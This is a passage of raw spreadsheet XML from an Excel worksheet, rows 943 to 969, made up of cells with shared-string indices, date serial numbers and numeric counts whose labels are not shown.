      <c r="J943" s="95" t="s">
        <v>269</v>
      </c>
      <c r="K943" s="95" t="s">
        <v>10</v>
      </c>
      <c r="L943" t="s">
        <v>77</v>
      </c>
      <c r="M943" s="95" t="s">
        <v>270</v>
      </c>
      <c r="N943" t="s">
        <v>271</v>
      </c>
      <c r="Q943" s="95" t="s">
        <v>2955</v>
      </c>
      <c r="R943">
        <v>198450</v>
      </c>
      <c r="S943">
        <v>218783</v>
      </c>
      <c r="T943">
        <v>196134</v>
      </c>
      <c r="U943">
        <v>216702</v>
      </c>
      <c r="V943">
        <v>233026</v>
      </c>
      <c r="W943" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="944" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A944" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B944" s="52">
        <v>44495.60851859954</v>
      </c>
      <c r="C944" s="95" t="s">
        <v>2598</v>
      </c>
      <c r="D944" s="96">
        <v>315</v>
      </c>
      <c r="E944" s="95" t="s">
        <v>2959</v>
      </c>
      <c r="F944" s="42">
        <v>103</v>
      </c>
      <c r="G944" s="95" t="s">
        <v>2960</v>
      </c>
      <c r="H944" t="s">
        <v>2961</v>
      </c>
      <c r="I944" t="s">
        <v>268</v>
      </c>
      <c r="J944" s="95" t="s">
        <v>269</v>
      </c>
      <c r="K944" s="95" t="s">
        <v>10</v>
      </c>
      <c r="L944" t="s">
        <v>77</v>
      </c>
      <c r="M944" s="95" t="s">
        <v>290</v>
      </c>
      <c r="N944" t="s">
        <v>291</v>
      </c>
      <c r="O944" s="95" t="s">
        <v>2962</v>
      </c>
      <c r="Q944" s="95" t="s">
        <v>2963</v>
      </c>
      <c r="R944">
        <v>40128175</v>
      </c>
      <c r="S944">
        <v>35134289</v>
      </c>
      <c r="T944">
        <v>38911106</v>
      </c>
      <c r="U944">
        <v>38660405</v>
      </c>
      <c r="V944">
        <v>44806196</v>
      </c>
      <c r="W944" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="945" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A945" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B945" s="52">
        <v>44615.993121701387</v>
      </c>
      <c r="C945" s="95" t="s">
        <v>2598</v>
      </c>
      <c r="D945" s="96">
        <v>401</v>
      </c>
      <c r="E945" s="95" t="s">
        <v>2959</v>
      </c>
      <c r="F945" s="42">
        <v>201</v>
      </c>
      <c r="G945" s="95" t="s">
        <v>2960</v>
      </c>
      <c r="H945" t="s">
        <v>2961</v>
      </c>
      <c r="I945" t="s">
        <v>268</v>
      </c>
      <c r="J945" s="95" t="s">
        <v>269</v>
      </c>
      <c r="K945" s="95" t="s">
        <v>10</v>
      </c>
      <c r="L945" t="s">
        <v>77</v>
      </c>
      <c r="M945" s="95" t="s">
        <v>290</v>
      </c>
      <c r="N945" t="s">
        <v>291</v>
      </c>
      <c r="Q945" s="95" t="s">
        <v>2964</v>
      </c>
      <c r="R945">
        <v>40128175</v>
      </c>
      <c r="S945">
        <v>35134289</v>
      </c>
      <c r="T945">
        <v>38911106</v>
      </c>
      <c r="U945">
        <v>38660405</v>
      </c>
      <c r="V945">
        <v>44806196</v>
      </c>
      <c r="W945" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="946" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A946" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B946" s="52">
        <v>44714.467278402779</v>
      </c>
      <c r="C946" s="95" t="s">
        <v>2598</v>
      </c>
      <c r="D946" s="96">
        <v>100</v>
      </c>
      <c r="E946" s="95" t="s">
        <v>2959</v>
      </c>
      <c r="F946" s="42">
        <v>100</v>
      </c>
      <c r="G946" s="95" t="s">
        <v>2960</v>
      </c>
      <c r="H946" t="s">
        <v>2965</v>
      </c>
      <c r="I946" t="s">
        <v>268</v>
      </c>
      <c r="J946" s="95" t="s">
        <v>269</v>
      </c>
      <c r="K946" s="95" t="s">
        <v>10</v>
      </c>
      <c r="L946" t="s">
        <v>77</v>
      </c>
      <c r="M946" s="95" t="s">
        <v>290</v>
      </c>
      <c r="N946" t="s">
        <v>291</v>
      </c>
      <c r="Q946" s="95" t="s">
        <v>1413</v>
      </c>
      <c r="R946">
        <v>40128175</v>
      </c>
      <c r="S946">
        <v>35134289</v>
      </c>
      <c r="T946">
        <v>38911106</v>
      </c>
      <c r="U946">
        <v>38660405</v>
      </c>
      <c r="V946">
        <v>44806196</v>
      </c>
      <c r="W946" t="s">
        <v>293</v>
      </c>
    </row>
    <row r="947" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A947" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B947" s="52">
        <v>44495.608518530091</v>
      </c>
      <c r="C947" s="95" t="s">
        <v>2598</v>
      </c>
      <c r="D947" s="96">
        <v>315</v>
      </c>
      <c r="E947" s="95" t="s">
        <v>2966</v>
      </c>
      <c r="F947" s="42">
        <v>311</v>
      </c>
      <c r="G947" s="95" t="s">
        <v>2967</v>
      </c>
      <c r="H947" t="s">
        <v>2968</v>
      </c>
      <c r="I947" t="s">
        <v>268</v>
      </c>
      <c r="J947" s="95" t="s">
        <v>269</v>
      </c>
      <c r="K947" s="95" t="s">
        <v>10</v>
      </c>
      <c r="L947" t="s">
        <v>77</v>
      </c>
      <c r="M947" s="95" t="s">
        <v>290</v>
      </c>
      <c r="N947" t="s">
        <v>291</v>
      </c>
      <c r="O947" s="95" t="s">
        <v>2969</v>
      </c>
      <c r="P947" t="s">
        <v>250</v>
      </c>
      <c r="Q947" s="95" t="s">
        <v>2963</v>
      </c>
      <c r="R947">
        <v>100867</v>
      </c>
      <c r="S947">
        <v>142294</v>
      </c>
      <c r="T947">
        <v>130189</v>
      </c>
      <c r="U947">
        <v>262576</v>
      </c>
      <c r="V947">
        <v>806818</v>
      </c>
      <c r="W947" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="948" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A948" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B948" s="52">
        <v>44603.042708125002</v>
      </c>
      <c r="C948" s="95" t="s">
        <v>2598</v>
      </c>
      <c r="D948" s="96">
        <v>401</v>
      </c>
      <c r="E948" s="95" t="s">
        <v>2966</v>
      </c>
      <c r="F948" s="42">
        <v>401</v>
      </c>
      <c r="G948" s="95" t="s">
        <v>2967</v>
      </c>
      <c r="H948" t="s">
        <v>2968</v>
      </c>
      <c r="I948" t="s">
        <v>268</v>
      </c>
      <c r="J948" s="95" t="s">
        <v>269</v>
      </c>
      <c r="K948" s="95" t="s">
        <v>10</v>
      </c>
      <c r="L948" t="s">
        <v>77</v>
      </c>
      <c r="M948" s="95" t="s">
        <v>290</v>
      </c>
      <c r="N948" t="s">
        <v>291</v>
      </c>
      <c r="Q948" s="95" t="s">
        <v>2964</v>
      </c>
      <c r="R948">
        <v>100867</v>
      </c>
      <c r="S948">
        <v>142294</v>
      </c>
      <c r="T948">
        <v>130189</v>
      </c>
      <c r="U948">
        <v>262576</v>
      </c>
      <c r="V948">
        <v>806818</v>
      </c>
      <c r="W948" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="949" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A949" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B949" s="52">
        <v>44714.467278414355</v>
      </c>
      <c r="C949" s="95" t="s">
        <v>2598</v>
      </c>
      <c r="D949" s="96">
        <v>100</v>
      </c>
      <c r="E949" s="95" t="s">
        <v>2966</v>
      </c>
      <c r="F949" s="42">
        <v>100</v>
      </c>
      <c r="G949" s="95" t="s">
        <v>2967</v>
      </c>
      <c r="H949" t="s">
        <v>2968</v>
      </c>
      <c r="I949" t="s">
        <v>268</v>
      </c>
      <c r="J949" s="95" t="s">
        <v>269</v>
      </c>
      <c r="K949" s="95" t="s">
        <v>10</v>
      </c>
      <c r="L949" t="s">
        <v>77</v>
      </c>
      <c r="M949" s="95" t="s">
        <v>290</v>
      </c>
      <c r="N949" t="s">
        <v>291</v>
      </c>
      <c r="Q949" s="95" t="s">
        <v>1413</v>
      </c>
      <c r="R949">
        <v>100867</v>
      </c>
      <c r="S949">
        <v>142294</v>
      </c>
      <c r="T949">
        <v>130189</v>
      </c>
      <c r="U949">
        <v>262576</v>
      </c>
      <c r="V949">
        <v>806818</v>
      </c>
      <c r="W949" t="s">
        <v>293</v>
      </c>
    </row>
    <row r="950" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A950" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B950" s="52">
        <v>44495.608518553243</v>
      </c>
      <c r="C950" s="95" t="s">
        <v>2598</v>
      </c>
      <c r="D950" s="96">
        <v>315</v>
      </c>
      <c r="E950" s="95" t="s">
        <v>2970</v>
      </c>
      <c r="F950" s="42">
        <v>111</v>
      </c>
      <c r="G950" s="95" t="s">
        <v>2971</v>
      </c>
      <c r="H950" t="s">
        <v>2972</v>
      </c>
      <c r="I950" t="s">
        <v>268</v>
      </c>
      <c r="J950" s="95" t="s">
        <v>269</v>
      </c>
      <c r="K950" s="95" t="s">
        <v>10</v>
      </c>
      <c r="L950" t="s">
        <v>77</v>
      </c>
      <c r="M950" s="95" t="s">
        <v>290</v>
      </c>
      <c r="N950" t="s">
        <v>291</v>
      </c>
      <c r="O950" s="95" t="s">
        <v>2973</v>
      </c>
      <c r="Q950" s="95" t="s">
        <v>2963</v>
      </c>
      <c r="R950">
        <v>1777991</v>
      </c>
      <c r="S950">
        <v>1508679</v>
      </c>
      <c r="T950">
        <v>449661</v>
      </c>
      <c r="U950">
        <v>449064</v>
      </c>
      <c r="V950">
        <v>780572</v>
      </c>
      <c r="W950" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="951" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A951" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B951" s="52">
        <v>44385.978538495372</v>
      </c>
      <c r="C951" s="95" t="s">
        <v>2598</v>
      </c>
      <c r="D951" s="96">
        <v>401</v>
      </c>
      <c r="E951" s="95" t="s">
        <v>2970</v>
      </c>
      <c r="F951" s="42">
        <v>201</v>
      </c>
      <c r="G951" s="95" t="s">
        <v>2971</v>
      </c>
      <c r="H951" t="s">
        <v>2972</v>
      </c>
      <c r="I951" t="s">
        <v>268</v>
      </c>
      <c r="J951" s="95" t="s">
        <v>269</v>
      </c>
      <c r="K951" s="95" t="s">
        <v>10</v>
      </c>
      <c r="L951" t="s">
        <v>77</v>
      </c>
      <c r="M951" s="95" t="s">
        <v>290</v>
      </c>
      <c r="N951" t="s">
        <v>291</v>
      </c>
      <c r="Q951" s="95" t="s">
        <v>2964</v>
      </c>
      <c r="R951">
        <v>1777991</v>
      </c>
      <c r="S951">
        <v>1508679</v>
      </c>
      <c r="T951">
        <v>449661</v>
      </c>
      <c r="U951">
        <v>449064</v>
      </c>
      <c r="V951">
        <v>780572</v>
      </c>
      <c r="W951" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="952" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A952" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B952" s="52">
        <v>44061.968377083336</v>
      </c>
      <c r="C952" s="95" t="s">
        <v>2598</v>
      </c>
      <c r="D952" s="96">
        <v>114</v>
      </c>
      <c r="E952" s="95" t="s">
        <v>2974</v>
      </c>
      <c r="F952" s="42">
        <v>114</v>
      </c>
      <c r="G952" s="95" t="s">
        <v>2975</v>
      </c>
      <c r="H952" t="s">
        <v>2976</v>
      </c>
      <c r="I952" t="s">
        <v>103</v>
      </c>
      <c r="J952" s="95" t="s">
        <v>104</v>
      </c>
      <c r="K952" s="95" t="s">
        <v>19</v>
      </c>
      <c r="L952" t="s">
        <v>77</v>
      </c>
      <c r="M952" s="95" t="s">
        <v>104</v>
      </c>
      <c r="Q952" s="95" t="s">
        <v>2977</v>
      </c>
      <c r="W952" t="s">
        <v>107</v>
      </c>
    </row>
    <row r="953" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A953" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B953" s="52">
        <v>43756.642468449078</v>
      </c>
      <c r="C953" s="95" t="s">
        <v>2598</v>
      </c>
      <c r="D953" s="96">
        <v>202</v>
      </c>
      <c r="E953" s="95" t="s">
        <v>2978</v>
      </c>
      <c r="F953" s="42">
        <v>201</v>
      </c>
      <c r="G953" s="95" t="s">
        <v>2600</v>
      </c>
      <c r="H953" t="s">
        <v>2979</v>
      </c>
      <c r="I953" t="s">
        <v>185</v>
      </c>
      <c r="J953" s="95" t="s">
        <v>186</v>
      </c>
      <c r="K953" s="95" t="s">
        <v>16</v>
      </c>
      <c r="L953" t="s">
        <v>83</v>
      </c>
      <c r="M953" s="95" t="s">
        <v>72</v>
      </c>
      <c r="O953" s="95" t="s">
        <v>2601</v>
      </c>
      <c r="P953" t="s">
        <v>1795</v>
      </c>
      <c r="Q953" s="95" t="s">
        <v>2980</v>
      </c>
      <c r="W953" t="s">
        <v>304</v>
      </c>
    </row>
    <row r="954" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A954" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B954" s="52">
        <v>43760.624119189815</v>
      </c>
      <c r="C954" s="95" t="s">
        <v>2598</v>
      </c>
      <c r="D954" s="96">
        <v>202</v>
      </c>
      <c r="E954" s="95" t="s">
        <v>2981</v>
      </c>
      <c r="F954" s="42">
        <v>101</v>
      </c>
      <c r="G954" s="95" t="s">
        <v>2604</v>
      </c>
      <c r="H954" t="s">
        <v>2605</v>
      </c>
      <c r="I954" t="s">
        <v>210</v>
      </c>
      <c r="J954" s="95" t="s">
        <v>211</v>
      </c>
      <c r="K954" s="95" t="s">
        <v>30</v>
      </c>
      <c r="L954" t="s">
        <v>83</v>
      </c>
      <c r="M954" s="95" t="s">
        <v>72</v>
      </c>
      <c r="Q954" s="95" t="s">
        <v>2980</v>
      </c>
      <c r="W954" t="s">
        <v>304</v>
      </c>
    </row>
    <row r="955" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A955" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B955" s="52">
        <v>44340.620269027779</v>
      </c>
      <c r="C955" s="95" t="s">
        <v>2982</v>
      </c>
      <c r="D955" s="96">
        <v>100</v>
      </c>
      <c r="E955" s="95" t="s">
        <v>2983</v>
      </c>
      <c r="F955" s="42">
        <v>100</v>
      </c>
      <c r="G955" s="95" t="s">
        <v>2984</v>
      </c>
      <c r="H955" t="s">
        <v>2985</v>
      </c>
      <c r="I955" t="s">
        <v>268</v>
      </c>
      <c r="J955" s="95" t="s">
        <v>269</v>
      </c>
      <c r="K955" s="95" t="s">
        <v>10</v>
      </c>
      <c r="L955" t="s">
        <v>77</v>
      </c>
      <c r="M955" s="95" t="s">
        <v>270</v>
      </c>
      <c r="N955" t="s">
        <v>271</v>
      </c>
      <c r="Q955" s="95" t="s">
        <v>161</v>
      </c>
      <c r="W955" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="956" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A956" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B956" s="52">
        <v>44340.620269004627</v>
      </c>
      <c r="C956" s="95" t="s">
        <v>2982</v>
      </c>
      <c r="D956" s="96">
        <v>100</v>
      </c>
      <c r="E956" s="95" t="s">
        <v>2986</v>
      </c>
      <c r="F956" s="42">
        <v>100</v>
      </c>
      <c r="G956" s="95" t="s">
        <v>2987</v>
      </c>
      <c r="H956" t="s">
        <v>2988</v>
      </c>
      <c r="I956" t="s">
        <v>268</v>
      </c>
      <c r="J956" s="95" t="s">
        <v>269</v>
      </c>
      <c r="K956" s="95" t="s">
        <v>10</v>
      </c>
      <c r="L956" t="s">
        <v>77</v>
      </c>
      <c r="M956" s="95" t="s">
        <v>270</v>
      </c>
      <c r="N956" t="s">
        <v>271</v>
      </c>
      <c r="Q956" s="95" t="s">
        <v>161</v>
      </c>
      <c r="W956" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="957" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A957" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B957" s="52">
        <v>44474.417397951387</v>
      </c>
      <c r="C957" s="95" t="s">
        <v>2989</v>
      </c>
      <c r="D957" s="96">
        <v>100</v>
      </c>
      <c r="E957" s="95" t="s">
        <v>2990</v>
      </c>
      <c r="F957" s="42">
        <v>100</v>
      </c>
      <c r="G957" s="95" t="s">
        <v>2991</v>
      </c>
      <c r="H957" t="s">
        <v>2992</v>
      </c>
      <c r="I957" t="s">
        <v>268</v>
      </c>
      <c r="J957" s="95" t="s">
        <v>269</v>
      </c>
      <c r="K957" s="95" t="s">
        <v>10</v>
      </c>
      <c r="L957" t="s">
        <v>77</v>
      </c>
      <c r="M957" s="95" t="s">
        <v>270</v>
      </c>
      <c r="N957" t="s">
        <v>271</v>
      </c>
      <c r="Q957" s="95" t="s">
        <v>2993</v>
      </c>
      <c r="W957" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="958" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A958" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B958" s="52">
        <v>44474.417397928242</v>
      </c>
      <c r="C958" s="95" t="s">
        <v>2989</v>
      </c>
      <c r="D958" s="96">
        <v>100</v>
      </c>
      <c r="E958" s="95" t="s">
        <v>2994</v>
      </c>
      <c r="F958" s="42">
        <v>100</v>
      </c>
      <c r="G958" s="95" t="s">
        <v>2995</v>
      </c>
      <c r="H958" t="s">
        <v>2996</v>
      </c>
      <c r="I958" t="s">
        <v>268</v>
      </c>
      <c r="J958" s="95" t="s">
        <v>269</v>
      </c>
      <c r="K958" s="95" t="s">
        <v>10</v>
      </c>
      <c r="L958" t="s">
        <v>77</v>
      </c>
      <c r="M958" s="95" t="s">
        <v>270</v>
      </c>
      <c r="N958" t="s">
        <v>271</v>
      </c>
      <c r="Q958" s="95" t="s">
        <v>2993</v>
      </c>
      <c r="W958" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="959" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A959" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B959" s="52">
        <v>44474.412798113422</v>
      </c>
      <c r="C959" s="95" t="s">
        <v>2997</v>
      </c>
      <c r="D959" s="96">
        <v>100</v>
      </c>
      <c r="E959" s="95" t="s">
        <v>2998</v>
      </c>
      <c r="F959" s="42">
        <v>100</v>
      </c>
      <c r="G959" s="95" t="s">
        <v>2999</v>
      </c>
      <c r="H959" t="s">
        <v>3000</v>
      </c>
      <c r="I959" t="s">
        <v>268</v>
      </c>
      <c r="J959" s="95" t="s">
        <v>269</v>
      </c>
      <c r="K959" s="95" t="s">
        <v>10</v>
      </c>
      <c r="L959" t="s">
        <v>77</v>
      </c>
      <c r="M959" s="95" t="s">
        <v>270</v>
      </c>
      <c r="N959" t="s">
        <v>271</v>
      </c>
      <c r="Q959" s="95" t="s">
        <v>2993</v>
      </c>
      <c r="W959" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="960" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A960" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B960" s="52">
        <v>44474.412798159719</v>
      </c>
      <c r="C960" s="95" t="s">
        <v>2997</v>
      </c>
      <c r="D960" s="96">
        <v>100</v>
      </c>
      <c r="E960" s="95" t="s">
        <v>3001</v>
      </c>
      <c r="F960" s="42">
        <v>100</v>
      </c>
      <c r="G960" s="95" t="s">
        <v>3002</v>
      </c>
      <c r="H960" t="s">
        <v>3003</v>
      </c>
      <c r="I960" t="s">
        <v>268</v>
      </c>
      <c r="J960" s="95" t="s">
        <v>269</v>
      </c>
      <c r="K960" s="95" t="s">
        <v>10</v>
      </c>
      <c r="L960" t="s">
        <v>77</v>
      </c>
      <c r="M960" s="95" t="s">
        <v>270</v>
      </c>
      <c r="N960" t="s">
        <v>271</v>
      </c>
      <c r="Q960" s="95" t="s">
        <v>2993</v>
      </c>
      <c r="W960" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="961" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A961" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B961" s="52">
        <v>44649.621827025461</v>
      </c>
      <c r="C961" s="95" t="s">
        <v>3004</v>
      </c>
      <c r="D961" s="96">
        <v>100</v>
      </c>
      <c r="E961" s="95" t="s">
        <v>3005</v>
      </c>
      <c r="F961" s="42">
        <v>100</v>
      </c>
      <c r="G961" s="95" t="s">
        <v>3006</v>
      </c>
      <c r="H961" t="s">
        <v>3007</v>
      </c>
      <c r="I961" t="s">
        <v>268</v>
      </c>
      <c r="J961" s="95" t="s">
        <v>269</v>
      </c>
      <c r="K961" s="95" t="s">
        <v>10</v>
      </c>
      <c r="L961" t="s">
        <v>77</v>
      </c>
      <c r="M961" s="95" t="s">
        <v>270</v>
      </c>
      <c r="N961" t="s">
        <v>271</v>
      </c>
      <c r="Q961" s="95" t="s">
        <v>161</v>
      </c>
      <c r="W961" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="962" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A962" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B962" s="52">
        <v>44721.899391134262</v>
      </c>
      <c r="C962" s="95" t="s">
        <v>3008</v>
      </c>
      <c r="D962" s="96">
        <v>100</v>
      </c>
      <c r="E962" s="95" t="s">
        <v>3009</v>
      </c>
      <c r="F962" s="42">
        <v>100</v>
      </c>
      <c r="G962" s="95" t="s">
        <v>3010</v>
      </c>
      <c r="H962" t="s">
        <v>3011</v>
      </c>
      <c r="I962" t="s">
        <v>268</v>
      </c>
      <c r="J962" s="95" t="s">
        <v>269</v>
      </c>
      <c r="K962" s="95" t="s">
        <v>10</v>
      </c>
      <c r="L962" t="s">
        <v>77</v>
      </c>
      <c r="M962" s="95" t="s">
        <v>270</v>
      </c>
      <c r="N962" t="s">
        <v>271</v>
      </c>
      <c r="Q962" s="95" t="s">
        <v>161</v>
      </c>
      <c r="W962" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="963" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A963" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B963" s="52">
        <v>44671.611334131943</v>
      </c>
      <c r="C963" s="95" t="s">
        <v>3012</v>
      </c>
      <c r="D963" s="96">
        <v>101</v>
      </c>
      <c r="E963" s="95" t="s">
        <v>3013</v>
      </c>
      <c r="F963" s="42">
        <v>101</v>
      </c>
      <c r="G963" s="95" t="s">
        <v>3014</v>
      </c>
      <c r="H963" t="s">
        <v>3015</v>
      </c>
      <c r="I963" t="s">
        <v>268</v>
      </c>
      <c r="J963" s="95" t="s">
        <v>269</v>
      </c>
      <c r="K963" s="95" t="s">
        <v>10</v>
      </c>
      <c r="L963" t="s">
        <v>77</v>
      </c>
      <c r="M963" s="95" t="s">
        <v>290</v>
      </c>
      <c r="N963" t="s">
        <v>291</v>
      </c>
      <c r="Q963" s="95" t="s">
        <v>161</v>
      </c>
      <c r="W963" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="964" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A964" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B964" s="52">
        <v>44475.653661631943</v>
      </c>
      <c r="C964" s="95" t="s">
        <v>3016</v>
      </c>
      <c r="D964" s="96">
        <v>110</v>
      </c>
      <c r="E964" s="95" t="s">
        <v>3017</v>
      </c>
      <c r="F964" s="42">
        <v>110</v>
      </c>
      <c r="G964" s="95" t="s">
        <v>3018</v>
      </c>
      <c r="H964" t="s">
        <v>3019</v>
      </c>
      <c r="I964" t="s">
        <v>268</v>
      </c>
      <c r="J964" s="95" t="s">
        <v>269</v>
      </c>
      <c r="K964" s="95" t="s">
        <v>10</v>
      </c>
      <c r="L964" t="s">
        <v>77</v>
      </c>
      <c r="M964" s="95" t="s">
        <v>1766</v>
      </c>
      <c r="N964" t="s">
        <v>1767</v>
      </c>
      <c r="Q964" s="95" t="s">
        <v>1325</v>
      </c>
      <c r="U964">
        <v>4</v>
      </c>
      <c r="V964">
        <v>10</v>
      </c>
      <c r="W964" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="965" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A965" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B965" s="52">
        <v>44684.642173368055</v>
      </c>
      <c r="C965" s="95" t="s">
        <v>3020</v>
      </c>
      <c r="D965" s="96">
        <v>101</v>
      </c>
      <c r="E965" s="95" t="s">
        <v>3021</v>
      </c>
      <c r="F965" s="42">
        <v>101</v>
      </c>
      <c r="G965" s="95" t="s">
        <v>3022</v>
      </c>
      <c r="H965" t="s">
        <v>3023</v>
      </c>
      <c r="I965" t="s">
        <v>268</v>
      </c>
      <c r="J965" s="95" t="s">
        <v>269</v>
      </c>
      <c r="K965" s="95" t="s">
        <v>10</v>
      </c>
      <c r="L965" t="s">
        <v>77</v>
      </c>
      <c r="M965" s="95" t="s">
        <v>290</v>
      </c>
      <c r="N965" t="s">
        <v>291</v>
      </c>
      <c r="Q965" s="95" t="s">
        <v>3024</v>
      </c>
      <c r="W965" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="966" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A966" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B966" s="52">
        <v>44645.746241168985</v>
      </c>
      <c r="C966" s="95" t="s">
        <v>3025</v>
      </c>
      <c r="D966" s="96">
        <v>100</v>
      </c>
      <c r="E966" s="95" t="s">
        <v>3026</v>
      </c>
      <c r="F966" s="42">
        <v>100</v>
      </c>
      <c r="G966" s="95" t="s">
        <v>3027</v>
      </c>
      <c r="H966" t="s">
        <v>3028</v>
      </c>
      <c r="I966" t="s">
        <v>268</v>
      </c>
      <c r="J966" s="95" t="s">
        <v>269</v>
      </c>
      <c r="K966" s="95" t="s">
        <v>10</v>
      </c>
      <c r="L966" t="s">
        <v>77</v>
      </c>
      <c r="M966" s="95" t="s">
        <v>290</v>
      </c>
      <c r="N966" t="s">
        <v>291</v>
      </c>
      <c r="Q966" s="95" t="s">
        <v>3029</v>
      </c>
      <c r="S966">
        <v>17</v>
      </c>
      <c r="U966">
        <v>7</v>
      </c>
      <c r="V966">
        <v>1</v>
      </c>
      <c r="W966" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="967" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A967" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B967" s="52">
        <v>44769.862446990737</v>
      </c>
      <c r="C967" s="95" t="s">
        <v>3025</v>
      </c>
      <c r="D967" s="96">
        <v>200</v>
      </c>
      <c r="E967" s="95" t="s">
        <v>3026</v>
      </c>
      <c r="F967" s="42">
        <v>200</v>
      </c>
      <c r="G967" s="95" t="s">
        <v>3027</v>
      </c>
      <c r="H967" t="s">
        <v>3028</v>
      </c>
      <c r="I967" t="s">
        <v>268</v>
      </c>
      <c r="J967" s="95" t="s">
        <v>269</v>
      </c>
      <c r="K967" s="95" t="s">
        <v>10</v>
      </c>
      <c r="L967" t="s">
        <v>77</v>
      </c>
      <c r="M967" s="95" t="s">
        <v>290</v>
      </c>
      <c r="N967" t="s">
        <v>291</v>
      </c>
      <c r="Q967" s="95" t="s">
        <v>3030</v>
      </c>
      <c r="V967">
        <v>1</v>
      </c>
      <c r="W967" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="968" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A968" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B968" s="52">
        <v>44294.653877083336</v>
      </c>
      <c r="C968" s="95" t="s">
        <v>3031</v>
      </c>
      <c r="D968" s="96">
        <v>112</v>
      </c>
      <c r="E968" s="95" t="s">
        <v>3032</v>
      </c>
      <c r="F968" s="42">
        <v>102</v>
      </c>
      <c r="G968" s="95" t="s">
        <v>3033</v>
      </c>
      <c r="H968" t="s">
        <v>3034</v>
      </c>
      <c r="I968" t="s">
        <v>268</v>
      </c>
      <c r="J968" s="95" t="s">
        <v>269</v>
      </c>
      <c r="K968" s="95" t="s">
        <v>10</v>
      </c>
      <c r="L968" t="s">
        <v>77</v>
      </c>
      <c r="M968" s="95" t="s">
        <v>270</v>
      </c>
      <c r="N968" t="s">
        <v>271</v>
      </c>
      <c r="Q968" s="95" t="s">
        <v>3035</v>
      </c>
      <c r="R968">
        <v>28</v>
      </c>
      <c r="S968">
        <v>6</v>
      </c>
      <c r="T968">
        <v>12</v>
      </c>
      <c r="U968">
        <v>26</v>
      </c>
      <c r="V968">
        <v>1738</v>
      </c>
      <c r="W968" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="969" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A969" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B969" s="52">
        <v>44522.390718946757</v>
      </c>
      <c r="C969" s="95" t="s">
        <v>3031</v>
      </c>
      <c r="D969" s="96">
        <v>112</v>
      </c>
      <c r="E969" s="95" t="s">
        <v>3036</v>
      </c>
      <c r="F969" s="42">
        <v>112</v>
      </c>
      <c r="G969" s="95" t="s">
        <v>3037</v>
      </c>
      <c r="H969" t="s">
        <v>3038</v>
      </c>
      <c r="I969" t="s">
        <v>268</v>
      </c>
      <c r="J969" s="95" t="s">
        <v>269</v>
      </c>
      <c r="K969" s="95" t="s">
        <v>10</v>
      </c>
      <c r="L969" t="s">
        <v>77</v>
      </c>
      <c r="M969" s="95" t="s">
        <v>270</v>
      </c>
      <c r="N969" t="s">
        <v>271</v>
      </c>
      <c r="Q969" s="95" t="s">
        <v>3035</v>
      </c>
      <c r="V969">
        <v>153</v>
      </c>
      <c r="W969" t="s">
        <v>95</v>
      </c>
    </row>
